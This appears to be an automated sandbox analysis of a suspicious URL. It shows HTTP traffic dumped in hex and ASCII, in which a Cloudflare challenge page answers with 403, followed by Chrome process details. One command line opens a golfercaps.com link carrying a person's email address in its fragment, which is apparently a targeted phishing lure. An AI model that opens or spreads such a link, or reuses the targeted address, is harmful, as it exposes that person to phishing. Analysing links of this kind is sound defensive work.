                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:43:19 UTC1285INHTTP/1.1 403 Forbidden
                                                                  Date: Mon, 30 Dec 2024 21:43:19 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Cross-Origin-Resource-Policy: same-origin
                                                                  Origin-Agent-Cluster: ?1
                                                                  Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                  Referrer-Policy: same-origin
                                                                  X-Content-Options: nosniff
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  cf-mitigated: challenge
                                                                  2024-12-30 21:43:19 UTC930INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 6c 56 7a 51 79 55 71 6d 65 79 39 42 6a 56 4b 4b 39 6a 44 37 46 4a 4e 6e 75 64 75 5a 64 74 59 47 42 76 51 35 5a 6b 37 58 4a 49 4c 50 41 69 77 58 70 59 46 42 35 57 69 34 46 68 74 4a 54 42 6b 52 4b 53 38 58 71 67 2b 33 76 56 6c 35 47 37 70 65 63 34 50 52 53 55 4a 39 37 34 66 51 44 4f 31 52 59 67 34 54 66 76 55 43 62 48 45 3d 24 75 37 54 34 66 77 34 33 68 53 37 4f 31 5a 32 57 63 72 33 67 54 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                                  Data Ascii: cf-chl-out: lVzQyUqmey9BjVKK9jD7FJNnuduZdtYGBvQ5Zk7XJILPAiwXpYFB5Wi4FhtJTBkRKS8Xqg+3vVl5G7pec4PRSUJ974fQDO1RYg4TfvUCbHE=$u7T4fw43hS7O1Z2Wcr3gTg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                                  2024-12-30 21:43:19 UTC523INData Raw: 32 32 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                  Data Ascii: 2248<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                                  2024-12-30 21:43:19 UTC1369INData Raw: 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65
                                                                  Data Ascii: Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-conte
                                                                  2024-12-30 21:43:19 UTC1369INData Raw: 65 78 74 22 3e 45 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 61 6e 64 20 63 6f 6f 6b 69 65 73 20 74 6f 20 63 6f 6e 74 69 6e 75 65 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 62 73 33 32 63 2e 67 6f 6c 66 65 72 63 61 70 73 2e 63 6f 6d 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 52 61 79 3a 20 27 38 66 61 35 33 34 36 37 62 61 62 62 33 33 35 30 27 2c 63 48 3a 20 27 6d 54 72 4f 41 34 49 62 33 36 54 5a 76 76 4e 51 52 75 44 49 50 4d 64 36 75 36 4f 65 53 79 47 36 63 4c 54 44 44 67 64 31 5f 6b 4d 2d 31 37
                                                                  Data Ascii: ext">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt={cvId: '3',cZone: "bs32c.golfercaps.com",cType: 'managed',cRay: '8fa53467babb3350',cH: 'mTrOA4Ib36TZvvNQRuDIPMd6u6OeSyG6cLTDDgd1_kM-17
                                                                  2024-12-30 21:43:19 UTC1369INData Raw: 54 71 55 39 52 76 6e 47 64 53 6d 41 6a 4c 5a 31 77 56 45 66 6e 4f 41 58 53 4f 7a 71 45 58 7a 54 38 45 50 51 6b 61 6e 39 41 45 6a 7a 54 68 45 33 75 6c 6a 75 41 31 44 74 76 4c 70 7a 56 7a 58 4c 6d 4c 59 37 43 67 48 68 67 73 71 6c 59 31 50 70 54 65 54 6f 33 56 51 32 54 36 71 4a 7a 67 37 31 54 4c 77 65 46 38 79 58 6a 5a 69 6d 70 62 4d 4f 54 54 51 6b 57 73 54 39 64 4f 30 43 78 44 44 71 75 75 7a 63 35 6d 70 56 6d 6d 4a 6e 41 70 44 70 6e 4b 45 64 67 41 38 2e 7a 34 6f 32 65 5a 4a 45 2e 38 4b 46 49 6e 4a 34 31 6d 61 58 43 64 59 41 65 6d 75 34 4a 4e 59 46 4c 79 4b 35 41 66 62 4f 69 4e 46 48 52 45 69 5f 4d 45 64 6c 46 6a 54 42 61 4a 74 48 52 51 38 31 49 47 56 6e 64 6c 4d 70 65 4f 71 61 4a 4b 69 70 77 63 5f 6f 35 56 5f 76 62 73 4a 4f 49 79 30 39 37 2e 78 4f 57 59 6e
                                                                  Data Ascii: TqU9RvnGdSmAjLZ1wVEfnOAXSOzqEXzT8EPQkan9AEjzThE3uljuA1DtvLpzVzXLmLY7CgHhgsqlY1PpTeTo3VQ2T6qJzg71TLweF8yXjZimpbMOTTQkWsT9dO0CxDDquuzc5mpVmmJnApDpnKEdgA8.z4o2eZJE.8KFInJ41maXCdYAemu4JNYFLyK5AfbOiNFHREi_MEdlFjTBaJtHRQ81IGVndlMpeOqaJKipwc_o5V_vbsJOIy097.xOWYn
                                                                  2024-12-30 21:43:19 UTC1369INData Raw: 30 59 4f 46 36 45 6e 56 57 76 43 58 58 43 63 5a 4a 5a 39 4f 35 4e 42 2e 38 55 67 71 53 59 72 37 54 42 36 41 55 67 30 37 52 46 44 39 6d 56 70 62 78 55 6d 78 4d 70 32 6b 44 5f 4b 61 59 6a 4f 4d 64 58 4b 38 51 56 41 38 42 46 7a 73 48 34 41 56 4c 37 71 62 73 73 33 71 6b 54 61 36 6a 6a 6e 5f 56 37 4c 33 47 52 52 6e 69 67 49 38 48 6c 2e 4c 4e 74 62 52 4f 75 64 6e 50 6b 79 62 6b 72 7a 4f 38 71 77 36 6b 58 30 4e 46 46 79 43 67 34 74 65 35 6a 70 2e 68 4b 73 76 7a 5f 75 77 46 70 52 67 43 43 31 33 4b 79 62 65 6f 53 78 6d 4d 68 4e 47 62 6b 36 50 47 48 74 4f 43 38 53 62 6f 48 76 78 6e 4f 64 35 45 79 2e 77 54 4f 35 7a 74 63 75 71 56 57 67 42 68 6f 45 4c 52 58 76 56 69 2e 57 4e 44 73 64 53 52 6c 6e 78 57 59 35 37 59 52 61 76 44 41 50 36 75 6e 41 71 76 49 45 47 54 50 30
                                                                  Data Ascii: 0YOF6EnVWvCXXCcZJZ9O5NB.8UgqSYr7TB6AUg07RFD9mVpbxUmxMp2kD_KaYjOMdXK8QVA8BFzsH4AVL7qbss3qkTa6jjn_V7L3GRRnigI8Hl.LNtbROudnPkybkrzO8qw6kX0NFFyCg4te5jp.hKsvz_uwFpRgCC13KybeoSxmMhNGbk6PGHtOC8SboHvxnOd5Ey.wTO5ztcuqVWgBhoELRXvVi.WNDsdSRlnxWY57YRavDAP6unAqvIEGTP0
                                                                  2024-12-30 21:43:19 UTC1369INData Raw: 50 77 78 4f 30 52 6e 68 56 36 70 70 6c 4d 39 56 70 33 2e 36 73 56 5f 5a 6b 32 6c 31 72 64 4d 44 49 36 62 6e 2e 39 6f 39 55 2e 52 5a 5a 32 68 2e 6e 56 32 33 51 65 44 76 5f 75 6e 53 72 45 65 63 57 59 6b 6e 77 4c 44 63 7a 49 71 46 49 5a 48 58 42 31 46 58 55 66 36 77 42 32 33 34 61 41 34 65 57 48 38 75 5a 67 53 31 6b 45 56 4b 43 74 6e 39 73 36 56 58 77 46 4a 4f 32 73 42 72 78 31 4b 66 6a 59 34 56 4a 75 6f 4a 4d 6a 78 39 58 58 4d 4c 54 7a 5a 67 56 70 57 4f 69 2e 6f 47 52 47 4c 70 30 71 47 6c 54 37 55 74 58 39 71 43 5f 6b 6f 35 4a 4d 64 49 6d 49 35 44 38 31 71 30 4b 6a 72 51 57 6d 34 47 6f 46 78 55 78 50 59 68 59 5f 67 4e 4f 6a 79 6e 50 30 77 42 44 31 45 43 51 62 53 70 79 57 77 35 4c 52 78 58 53 6e 5a 58 4f 46 33 32 35 38 4a 75 57 4a 73 2e 64 37 73 32 4b 37 5f
                                                                  Data Ascii: PwxO0RnhV6pplM9Vp3.6sV_Zk2l1rdMDI6bn.9o9U.RZZ2h.nV23QeDv_unSrEecWYknwLDczIqFIZHXB1FXUf6wB234aA4eWH8uZgS1kEVKCtn9s6VXwFJO2sBrx1KfjY4VJuoJMjx9XXMLTzZgVpWOi.oGRGLp0qGlT7UtX9qC_ko5JMdImI5D81q0KjrQWm4GoFxUxPYhY_gNOjynP0wBD1ECQbSpyWw5LRxXSnZXOF3258JuWJs.d7s2K7_
                                                                  2024-12-30 21:43:19 UTC1369INData Raw: 57 42 33 75 52 6b 6d 56 6a 5a 45 53 37 63 5a 47 4c 67 70 6a 63 5f 44 6d 4a 77 44 73 51 62 73 5a 30 67 54 4f 48 61 52 41 72 65 44 4e 6e 41 61 70 69 47 51 6e 74 37 67 64 76 55 62 59 6f 30 63 6e 53 2e 5f 61 41 52 43 52 48 77 39 52 45 4b 6d 67 72 62 39 56 53 55 47 65 6c 56 52 70 35 68 72 35 6f 51 38 53 78 36 50 37 30 64 41 2e 67 56 79 5a 47 6e 64 41 2e 41 50 49 37 33 35 59 75 62 49 49 5f 4b 63 47 7a 65 50 5f 42 4f 75 55 38 4b 76 56 32 37 67 42 4c 44 74 68 6f 55 76 42 4f 63 50 64 71 59 53 2e 49 6b 64 66 6e 6d 2e 66 62 4a 5a 6c 54 49 59 55 6e 4b 63 55 59 37 58 43 71 6b 43 39 6b 49 32 50 35 72 49 5a 59 47 31 68 6f 45 53 61 39 38 6e 50 38 6c 31 59 6b 46 4a 49 33 63 7a 30 37 59 35 5a 45 45 53 77 74 56 67 71 71 62 67 57 33 5a 74 5a 66 2e 45 2e 33 4a 45 48 68 59 69
                                                                  Data Ascii: WB3uRkmVjZES7cZGLgpjc_DmJwDsQbsZ0gTOHaRAreDNnAapiGQnt7gdvUbYo0cnS._aARCRHw9REKmgrb9VSUGelVRp5hr5oQ8Sx6P70dA.gVyZGndA.API735YubII_KcGzeP_BOuU8KvV27gBLDthoUvBOcPdqYS.Ikdfnm.fbJZlTIYUnKcUY7XCqkC9kI2P5rIZYG1hoESa98nP8l1YkFJI3cz07Y5ZEESwtVgqqbgW3ZtZf.E.3JEHhYi
                                                                  2024-12-30 21:43:19 UTC47INData Raw: 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 7d 28 29 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: appendChild(cpo);}());</script></body></html>
                                                                  2024-12-30 21:43:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:16:42:05
                                                                  Start date:30/12/2024
                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                  Imagebase:0x7ff76e190000
                                                                  File size:3'242'272 bytes
                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:2
                                                                  Start time:16:42:08
                                                                  Start date:30/12/2024
                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2004,i,16542891561476975858,14649593030088590238,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                  Imagebase:0x7ff76e190000
                                                                  File size:3'242'272 bytes
                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:3
                                                                  Start time:16:42:14
                                                                  Start date:30/12/2024
                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com"
                                                                  Imagebase:0x7ff76e190000
                                                                  File size:3'242'272 bytes
                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  No disassembly